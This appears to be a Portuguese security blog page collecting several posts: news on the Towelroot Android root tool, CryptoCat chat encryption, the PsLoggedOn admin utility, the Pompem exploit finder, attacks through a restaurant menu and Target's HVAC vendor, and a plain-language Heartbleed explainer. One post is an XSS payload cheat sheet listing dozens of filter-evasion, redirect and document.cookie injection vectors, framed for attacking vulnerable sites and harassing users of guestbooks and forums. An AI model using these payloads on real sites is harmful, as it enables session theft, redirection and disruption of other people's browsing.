Hacker cria app capaz de fazer root em quase todos os Androids

Houve um tempo em que o Android era fácil de ser “rootado”, mas essa não é mais uma realidade para qualquer aparelho. Pelo menos até agora, já que o hacket George Hotz, conhecido pelo apelido de “Geohot”, desenvolveu e lançou um método para destravar o Galaxy S5 das operadoras AT&T e Verizon, especialmente difíceis, mas que deve ser capaz de desbloquear qualquer aparelho.

A ferramenta se chama Towelroot e promete ser o jeito mais fácil de aplicar o root ao seu Android. Para isso, basta entrar neste site, baixar o APK e instalá-lo no celular. Em seguida, basta pressionar um único botão, que traz os dizeres “make it ra1n”. Após o término do processo, o aparelho deve estar “rootado”.

O hacker, que também é o mesmo que arrumou problemas com a Sony por rodar Linux no PlayStation 3 e também por ter criado uma ferramenta de jailbreak do iPhone em 2010, diz que o Towelroot deve funcionar com qualquer aparelho com Android 4.4.2 ou inferior, o que inclui todos os aparelhos recentes da Samsung, LG, e vários outros.

A ferramenta se baseia em uma vulnerabilidade no kernel do Linux já conhecida e corrigida nos desktops, mas que permanece no Android.

Vale observar que do ponto de vista do entusiasta do root, para ter mais liberdade na plataforma, a notícia é excelente. Do ponto de vista da segurança, nem tanto. Por ser tão simples de aplicar, o Towelroot pode ser distribuído com outros apps mal-intencionados. O root torna praticamente ilimitado o poder de um malware sobre o sistema, o que é algo realmente perigoso.

 

Site: http://towelroot.com/

Em tempos de espionagem, saiba como criptografar seu chat do Facebook (CryptoCat)

Usuários do Facebook podem utilizar a extensão para navegadores CryptoCat para iniciar conversas criptografadas com seus contatos. Para que a ferramenta funcione, é necessário que seu amigo também instale o recurso. A criptografia impede que uma conversa seja visualizada em caso de invasões da sua conta e, também, impede que elas fiquem registradas como mensagens comuns do Facebook. Veja como conversar em “segredo” na rede social e se sentir mais seguro no bate-papo.

Altere as opções de filtros de mensagens do Facebook em poucos passos (Foto: Divulgação/Facebook) (Foto: Altere as opções de filtros de mensagens do Facebook em poucos passos (Foto: Divulgação/Facebook))
Como criptografar suas conversas no chat do Facebook com o CryptoCat (Foto: Divulgação/Facebook)

 

Passo 1. Baixe a extensão para web do CryptoCat no TechTudo Downloads para Google Chrome . Instale no navegador e abra o CryptoCat em “Aplicativos”;

Fonte:Techtudo

Como descobrir o usuário logado em uma estação

Dica do meu amigo Tiago Souza

Introdução

 O Psloggedon é um utilitário da sysinternals que mostra o usuário logado em uma estação de trabalho do domínio active directory.

Conteúdo

Vamos mostrar uma prática comum no dia a dia. Precisamos verificar se um endereço de IP está sendo usado no momento, para isso executamos o PING no endereço. Exemplo, vamos pingar o endereço IP 192.168.112.170.

Já que respondeu vamos descobrir agora qual o nome DNS desse computador no domínio executando nslookup.

Agora vamos mais a fundo, quem será que está logado nessa estação de trabalho? Para isso vamos utilizar oPSLOGGEDON.

Você vai ter que executar o download da ferramenta, que é bem leve (1.60MB), para isso visite:http://technet.microsoft.com/en-us/sysinternals/bb897545.aspx  .

Depois é só executa-la uma vez e acessar o cmd para trabalhar com o comando. Estou usando o powershell por costume, mas pode ser o prompt de comando, que alguns chamam de DOS. :)

Baseado no número do computador que queremos descobrir o usuário logado digitamos:

Psloggedon nome_computador -l -x

Vejamos o help do aplicativo para entender melhor.

O que fizemos foi buscar quem está logado localmente sem mostrar a opção logon times (que pode trazer informações desnecessárias).

Esse é o método mais prático, mas se você precisa buscar pelo nome de usuário também é possivel digitando:

Psloggedon nome_usuario -l -x

Note que você tem que ter permissão nas máquinas do domínio para executar essa operação, algumas ele pode não abrir, mas veja que ele conseguiu descobrir a máquina “TIAGO”.

Se você não usar a opção “–l” ele busca logins remotos também.

Conclusão

Essa é uma ferramenta muito útil que ajuda o administrador de sistemas a encontrar em que computador os usuários do domínio estão logados.

XSS – Guia de Filtros e exemplos de Ataques

Nesta seção, vamos olhar para uma série de filtros e exemplos de XSS (Cross Site Scripting) ataques destinados a sites e penetração com vulnerabilidades XSS, espero que possa ajudar e dar ideias. Mensagem de alerta XSS Com esse código, uma mensagem de aviso será gerada em toda a página vulnerável, a mensagem é modificada:

  1. <script>alert(“XSS”);</script>  
  1. <IMG SRC=“javascript:alert(‘XSS’);”>
  1. <IMG SRC=javascript:alert(‘XSS’)>  
  1. <IMG SRC=JaVaScRiPt:alert(‘XSS’)> 
  1. <IMG SRC=javascript:alert(“XSS”)>  
  1. <IMG SRC=`javascript:alert(“RM’XSS'”)`>
  1. <IMG “””><SCRIPT>alert(“XSS”)</SCRIPT>>  
  1. <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>  
  1. <IMG SRC=“jav    ascript:alert(‘XSS’);”>  
  1. <IMG SRC=“jav    ascript:alert(‘XSS’);”>  
  1. <IMG SRC=”javascript:alert(‘XSS’);”>
  1. <IMG SRC=”javascript:alert(‘XSS’);”>
  1. <IMG SRC=”   javascript:alert(‘XSS’);”> 
  1. <IMG SRC=“javascript:alert(‘XSS’)”>  
  1. <IMG DYNSRC=“javascript:alert(‘XSS’)”>  
  1. <IMG LOWSRC=“javascript:alert(‘XSS’)”> 
  1. <IMG SRC=‘vbscript:msgbox(“XSS”)’>  
  1. <DIV STYLE=“background-image: url(javascript:alert(‘XSS’))”>  
  1. <DIV STYLE=“background-image:07507206C028’06a06107606107306307206907007403a06106c065072074028.1027058.1053053027029’029”>  
  1. <DIV STYLE=“background-image: url(javascript:alert(‘XSS’))”>  
  1. <DIV STYLE=“width: expression(alert(‘XSS’));”>  
  1. <BODY BACKGROUND=“javascript:alert(‘XSS’)”>  
  1. <BODY ONLOAD=alert(‘XSS’)>  
  1. <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>  
  1. <TABLE BACKGROUND=“javascript:alert(‘XSS’)”>  
  1. <TABLE><TD BACKGROUND=“javascript:alert(‘XSS’)”>  

Uma maneira simples de tocar o nariz para os usuários é de alertas de pontuação intermináveis. Isso vai forçá-los a matar o processo do navegador, por ter muitas abas. Se isso acontece no meio de uma transação ou outro momento importante de navegação pode ser desastroso para o usuário, este método é mais eficaz no livro de visitas ou fóruns vulnerável:

Redirecionamento XSS Para realizar um redirecionamento e fazer um site inacessível, podemos tentar usar document.location, window.location, location.replace location.assign e todos geram o mesmo resultado de redirecionamento:

  1. <script>document.location.href = https://mundotecnologico.net/&#8221;;</script>  
  1. <script>window.location = https://mundotecnologico.net/&#8221;;</script>  
  1. <script>location.assign(“”http://mundotecnologico.net/””);</script>  
  1. <script>location.replace(“http://mundotecnologico.net/”);</script>  

Robo de Cookie e Sessão A través da propiedad document.cookie podemos sacar o cookie que está utilizando o usuario:

  1. <script language=“javascript”>alert(“XSS Cookie: ” + document.cookie);</script  
  1. <IMG SRC=“javascript:document.cookie=true;”>  
  1. <IMG DYNSRC=“javascript:document.cookie=true;”>  
  1. <IMG LOWSRC=“javascript:document.cookie=true;”>  
  1. <IMG STYLE=“CrossSiteScripting:expr/*CrossSiteScripting*/ession(document.cookie=true)”>  
  1. <iframe src=”javascript:document.cookie=true;>  
  1. <INPUT TYPE=“IMAGE” SRC=“javascript:document.cookie=true;”>  
  1. <BODY BACKGROUND=“javascript:document.cookie=true;”>  
  1. <BODY ONLOAD=document.cookie=true;>  
  1. <BGSOUND SRC=“javascript:document.cookie=true;”>  
  1. <BR SIZE=“&{document.cookie=true}”>  
  1. <LINK REL=“stylesheet” HREF=“javascript:document.cookie=true;”>  
  1. <TABLE BACKGROUND=“javascript:document.cookie=true;”>  
  1. <DIV STYLE=“background-image: url(javascript:document.cookie=true;)”>  
  1. <DIV STYLE=“background-image: url(javascript:document.cookie=true;)”>  
  1. <DIV STYLE=“width: expression(document.cookie=true);”>  
  1. <STYLE TYPE=“text/javascript”>document.cookie=true;</STYLE>  
  1. <STYLE>.CrossSiteScripting{background-image:url(“javascript:document.cookie=true“);}</STYLE><A CLASS=CrossSiteScripting></A>  
  1. <STYLE type=“text/css”>BODY{background:url(“javascript:document.cookie=true“)}</STYLE>  
  1. <iframe src=”javascript:document.cookie=true;>  
  1. <div onmouseover=“document.cookie=true;”>  
  1. <div style=“background-image: url(javascript:document.cookie=true;);”>  
  1. <div style=“width: expression(document.cookie=true;);”>  
  1. <body onload=“document.cookie=true;”>  
  1. <iframe src=”javascript:document.cookie=true;>  

Caso queira um documento com muitos outros comandos, veja abaixo:

XSS_Extra

Pompem – Exploit Finder

Pompem Exploit Finder

A busca por Exploits é algo rotineiro durante um processo de Pentest, pensando nisso a equipe Relax Lab desenvolveu a Pompem – Exploit Finder.

Pompem é uma ferramenta de código aberto, projetada para automatizar a busca por exploits nos maiores Databases. Desenvolvida em Python, tem um sistema de busca avançado, facilitando assim o trabalho de Pentesters e Hackers Ético. Na sua versão atual, realiza pesquisas nos seguintes Databases:Exploit-db1337DayPacketstorm Security


Sua instalação pode ser feita via clonagem do GIT

git clone https://github.com/rfunix/Pompem.git Pompem-dev

E também Download dos arquivos em .zip DOWNLOAD

Seu uso é simples e intuitivo, abaixo PrintScreen de seu layout inicial:

Pompem - Exploit Finder - Layout Inicial

Realizando uma busca por Exploits para telnet:

Pompem - Exploit Finder - Search Telnet Exploits

A ferramenta também disponibiliza que o resultado seja salvo em HTML, bastando utilizar a flag –html.

Pompem - Exploit Finder - Resultado em HTML

 

Mais informações e código fonte da ferramenta, podem ser encontradas no GIT do projeto: https://github.com/rfunix/Pompem/

 

 

Relax Lab é uma equipe formada por:
Rafael Francischini ( Programmer and Ethical Hacking) –  @rfunix
Bruno Fraga (Security Research) – @brunofraga_net

Fonte:BrasilPentest

Hackers já haviam invadido empresa por sistema de ar-condicionado e máquina de salgadinhos, agora invadem por cardápio de restaurante

Incapazes de invadir a rede de computadores numa grande empresa de petróleo, hackers infectaram com um malware o cardápio online de um restaurante chinês muito utilizado pelos funcionários. Ao escolherem seu almoço, eles acidentalmente baixaram um código que deu aos agressores uma base na ampla rede computacional da empresa.

lição com o incidente ficou clara: empresas que procuram proteger seus sistemas contra hackers e espiões do governo precisam procurar vulnerabilidades nos locais mais improváveis.

 

Na recente invasão do cartão de pagamentos da Target, hackers ganharam acesso aos registros da loja através do sistema de ar condicionado. [O sistema da Target, segunda rede de varejo dos EUA, sofreu um ataque em dezembro do ano passado, com o qual os criminosos roubaram dados de cartões de crédito de 40 milhões de clientes.] Em outros casos, hackers usaram impressoras, termostatos e equipamentos de videoconferência.

Os invasores instalaram um malware na rede dos equipamentos POS (ponto de venda) que processam o pagamento via cartões de crédito e débito. Através do malware os dados dos cartões foram copiados e transferidos para servidores em outros países, incluindo o Brasil. O ataque ocorreu justamente antes do feriado de Thanksgiving e da famosa Black Friday quando milhões de pessoas correm aos estabelecimentos para se aproveitar das ofertas. O acesso à rede se deu via um provedor externo de manutenção de ar condicionado, supostamente com acesso a fim de monitorar a temperatura e funcionamento dos equipamentos de refrigeração. Os criminosos roubaram a senha da empresa, obtiveram livre acesso à rede da Target e implantaram um malware nos equipamentos de ponto de venda. Tiveram tempo suficiente para testar primeiro em alguns antes de instalar em todos os POS. Com certeza não esperavam da vítima nenhum tipo de monitoração. Como de praxe o problema foi detectado bem depois.

 

“A beleza é que ninguém presta atenção nesses dispositivos”, declara George Kurtz, presidente da Crowdstrike, outra firma de segurança. “Então é bastante fácil para o intruso se esconder”.

Explicando o Heartbleed for Dummies

Artigo retirado do blog do Anchises

Observação: só para evitar mal entendidos, o título “for Dummies” deste post é porque o texto é bem simples e voltado para leigos. Não é minha intenção dar nenhuma conotação negativa.





* O QUE É O HEARTBLEED 

Heartbleed é o nome que foi dado a um problema no sistema OpenSSL. O OpenSSL se trata de uma biblioteca de softwares que é usada pela maioria dos sites para garantir a sua comunicação utilizando um sistema de segurança chamado “SSL”. Ele fornece  o “S” de “security”  nos endereços da Internet que começam com HTTPS, ou se você preferir, é ele o responsável pelo ícone de cadeado na barra de endereços do seu navegador enquanto você navega na web. 

Normalmente, quando navegando em um site usando SSL, você pode confiar que a informação que você envia para o site só pode ser vista pelo próprio site. Isso mantém seguras as sua informações privadas, tais como cartões de crédito, nomes de usuário e senhas. 

A exploração da falha Heartbleed permite que atacantes contornem as proteções fornecidas pelo SSL. Isso significa que todas as informações que você enviou para um site que teve versões vulneráveis do OpenSSL podem já estarem nas mãos dos bandidos. A exploração desta vulnerabilidade é silenciosa e não deixa nenhuma pista ou registro do acontecido. Não é possível determinar se você foi ou não afetado. 

Os sites mais importantes já corrigiram a falha, entretanto as suas e as minhas informações pessoais e, principalmente, nossas senhas, podem ter vazado para as mãos de pessoas má intencionadas. Insisto: não é possível determinar se você foi ou não afetado. 

* ATUALIZE SUAS SENHAS 

Há uma boa chance que você tenha utilizado sites vulneráveis. A reação impensada a esta notícia é mudar todas as suas senhas imediatamente. Mas, ainda que eu esteja realmente recomendando que você mude suas senhas, é importante entender que nem todos os sites já foram atualizados, para proteger contra essa vulnerabilidade.

O melhor conselho que tenho, no momento, é que você  mude suas senhas dos sites mais importantes de imediato, incluindo seu e-mail, suas contas bancárias, suas redes sociais, e outros alvos de alto valor para você. Isto irá fornecer, insisto, no momento, a sua melhor defesa contra os ataques anteriores.

Depois de algumas semanas os sites terão sido atualizados com novos certificados SSL, e seremos capazes de confiar novamente no SSL. Então, neste ponto, você deverá mudar todas as suas senhas novamente, por precaução. 

* COMO ESCOLHER UMA SENHA SEGURA 

Pense numa frase que seja fácil de memorizar e que contenha números. Depois pegue as primeiras letras e números da frase, com letras maiúsculas e minúsculas, forme a senha com eles, e comece ou termine com um símbolo. Exemplo:

Minha mãe Olivia tinha 25 anos quando casou
Senha: %MmOt25aqc% 

Eu tenho 13 albuns do Pink Floyd!! 
Senha: =Et13adPF!! 

Estas são senhas seguras, difíceis de serem quebradas ou adivinhadas. Qualquer coisa diferente disso é fácil de ser quebrada. 

* DEDIQUE ALGUM TEMPO A ISSO, COM SERIEDADE 

O Heartbleed é uma questão realmente muito séria para a Internet e para sua segurança. Trata-se de uma grave ameaça à infra-estrutura crítica da Internet. Então você deve dedicar algum tempo para atualizar suas senhas. Eu não estaria lhe dizendo isso se a questão não fosse realmente grave. 

Idealmente você deve mudar todas as suas senhas, mas, no mínimo, por favor atualize aquelas dos sites mais importantes. Senhas novas, fortes e únicas são sua melhor defesa contra Heartbleed. 

* COMPARTILHE O CONHECIMENTO

Por favor, compartilhe notícias de Heartbleed com seus amigos e família. Basta encaminhar este e-mail. Este será um grande primeiro passo para ajudá-los a saber que este é um problema muito, muito, sério. Nos últimos dias nossa equipe de analistas dedicou muito tempo para alertar pessoas, empresas e instituições e também para ajudar sanar o problema, compartilhando e informando sobre a sua gravidade. 

Espero que você também seja capaz de transformar esta crise numa oportunidade para o bem, assim como estamos fazendo.

 

Resumindo:

 

Heartbleed Explanation

Fonte: Anchises